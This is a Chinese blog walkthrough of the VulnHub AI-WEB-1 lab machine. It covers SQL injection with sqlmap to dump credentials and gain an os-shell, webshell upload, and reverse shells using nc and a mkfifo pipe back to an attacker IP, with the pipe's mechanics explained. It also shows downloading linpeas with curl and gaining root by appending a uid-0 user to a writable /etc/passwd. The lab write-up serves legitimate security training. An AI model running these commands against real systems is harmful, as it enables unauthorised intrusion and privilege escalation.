AI-WEB-1 vulnhub靶场

于 2024-06-05 01:16:08 发布
阅读量402 收藏 10
点赞数 5
分类专栏: Vulnhub 文章标签: 网络安全 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/139457194
版权

AI-WEB-1

在这里插入图片描述

端口扫描

仅开放80端口

在这里插入图片描述

访问80端口

啥也没有

在这里插入图片描述

目录扫描

在这里插入图片描述

查看robots.txt

发现两个新目录
在这里插入图片描述

Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/

全都无权限访问

在这里插入图片描述

加入路径后再次扫描目录

发现/m3diNf0/目录下存在info.php/se3reTdir777/目录下存在index.php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

info.php是php配置文件,字太多暂时放一放

在这里插入图片描述

index.php有输入框,输入数字可查看用户信息,顺理成章想到sql注入

在这里插入图片描述

输入``时发现报错,直接上sqlmap

在这里插入图片描述

bp截获数据包,写入1.txt

在这里插入图片描述

sqlmap -r 1.txt -p uid

发现注入点

在这里插入图片描述

最后发现两个表usersystemUser
user表没用

在这里插入图片描述

sqlmap -r 1.txt -p uid -D aiweb1 -T systemUser -C username,password --dump

systemUser表内有password

在这里插入图片描述

看上去像base64,最后只有aiweb1pwn解出来了

在这里插入图片描述

MyEvilPass_f908sdaf9_sadfasf0sa

本来想ssh,才想起来没开放22端口

暂时没想到这个密码有什么用,先放一放

直接使用sqlmap开一个终端

sqlmap -r 1.txt -p uid --

os-shell需要一个写入目录,未知,回头看info.php
在这里插入图片描述

发现网站本地目录为/home/www/html/web1x443290o2sdf92213

os-shell需要一个上传文件的地方,于是刚好有/se3reTdir777/uploads/

连起来就是/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

在这里插入图片描述

直接反弹shell没成功,写入蚁剑反弹脚本

在攻击机上开启http服务

在这里插入图片描述

os-shell远程下载反弹shell脚本

在这里插入图片描述

蚁剑连接成功

在这里插入图片描述

蚁剑反弹shell

bash -i 没成功

在这里插入图片描述

改用nc -e /bin/bash 192.168.181.129 1234
在这里插入图片描述

发现不能使用-e参数

搜索后发现可以通过创建管道绕过-e参数

rm /tmp/f

mkfifo /tmp/f

 cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.181.129 1234 >/tmp/f

cat /tmp/f读取管道里的内容;/bin/sh -i 2>&1以交互方式运行/bin/sh,并将标准错误重定向到标准输出;nc ip port > /tmp/f连接 ip:port
并将输出重定向到/tmp/f。

这条命令的逻辑是这样的:cat /tmp/f等待并从命名管道中获取命令,然后将获取到的命令通过匿名管道发送到/bin/sh执行,然后/bin/sh将返回的结果再通过匿名管道发送给ncnc则将命令的结果发送到
ip:port ,如果 ip:port 再次输入的命令,那么这个命令被nc接收后会被重定向到/tmp/f

记得事先在攻击机开启监听

nc -lvnp 1234

在这里插入图片描述

查看用户目录,发现aiweb1,和刚刚数据库里查出来的用户吻合

在这里插入图片描述

su aiweb1

可惜没成功

在这里插入图片描述

上传linpeas.sh

curl http://192.168.181.129:8888/linpeas.sh -o linpeas.sh

执行

发现/etc/passwd可以任意写

在这里插入图片描述

创建一个用户写入

openssl passwd -1 -salt cccc 123456

echo 'cccc:$1$cccc$86ybZ4sfCXVS9DhweUEVb.:0:0::/root:/bin/bash' >> /etc/passwd

成功提权

在这里插入图片描述

川川小宝
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3820
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI:WEB:1 Walkthrough
weixin_30470643的博客
09-26 314
AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描 浏览网页 爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 提权 读取falg文件靶机和攻击机处于统一网段下 所以就不用net...
AI_web_1 ,靶机初体验
weixin_44377940的博客
12-06 360
大佬给了个这个靶机给我玩,我就试着打了一下,学到了很多东西,就记录下来了 首先,用netdiscover先看看主机的ip是啥: 试试第一个 图中可以看到,只开了个80端口,apache的中间件,其中的文件有robots.txt,下面两个目录不允许进入,这应该就是靶机的IP了。 浏览器打开看看: 试试id=1: 估计有注入,祭出神器sqlmap: 但是,好像没有意义,因为这个是sql用户,...
AI-Web-1 靶场
weixin_46044002的博客
06-23 263
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell。显示中有一个什么什么uploads,一个文件上传的目录。emmm,我直呼好家伙,这不是相当于还是啥也没有。一样的,环境搭好了,但是啥也没有,先找他的ip。我把靶机环境移除,在重新打开,页面出来了。得到数据,但都不是靶机的登录信息。有个info.php访问看看。
AIweb1提权
qq_39742838的博客
12-09 303
1.AIweb1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
06-25
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
text-generation-webui-main
09-20
在当今的自然语言处理(NLP)领域,文本生成技术已经成为一个热门的研究方向,它广泛应用于智能助手、自动摘要、创意写作等多个场景。本文将深入探讨“text-generation-webui-main”项目,这是一个集成了多种模型...
2022年优秀-Web服务技术1.pptx
11-17
随着互联网的发展,Web Service将继续发挥关键作用,特别是在物联网(IoT)、大数据分析和人工智能等领域。未来的Web Service可能会更加强调安全性、性能优化和智能化,以适应不断增长的网络需求和复杂的服务环境。 ...
人工智能-数据挖掘-基于WEB的数据挖掘研究.pdf
06-25
《人工智能-数据挖掘-基于WEB的数据挖掘研究》的文件主要探讨了在21世纪初,随着Web技术的飞速发展,如何有效地利用Web数据进行知识发现的问题。Web数据的特性,如海量、分散、动态、异质和半结构化,使得传统数据库...
秋叶整合包sd-webui安装整合包(最新最终版本,优化显存,AI绘图免费版本,功能齐全,一键本地部署ai绘画)
最新发布
05-06
【秋叶整合包sd-webui安装整合包】是一款集成了最新技术与优化的软件解决方案,专为AI绘画爱好者和开发者设计。这个整合包的核心在于它的一键本地部署功能,使得用户能够轻松在自己的设备上搭建并运行AI绘图系统,...
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2440
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2747
AI-WEB-1.0 多方法渗透
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1383
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
AI-Web-1.0靶场
qq_46187131的博客
03-27 1245
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 938
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6213
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
AI web1靶机知识点
网络安全。
04-12 698
搬砖日常ing… 靶机地址:https://www.vulnhub.com/entry/ai-web-1,353/ 0x01 sqlmap之–os-shell 1、条件 1)需要网站绝对路径(phpinfo或网站报错信息获取)。 2)该路径目录允许写入 2、os-shell 1)一般上传目录都是允许写入的,靶机这里刚好有个upload目录,可成功执行–os-shell。 2)sqlmap --...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值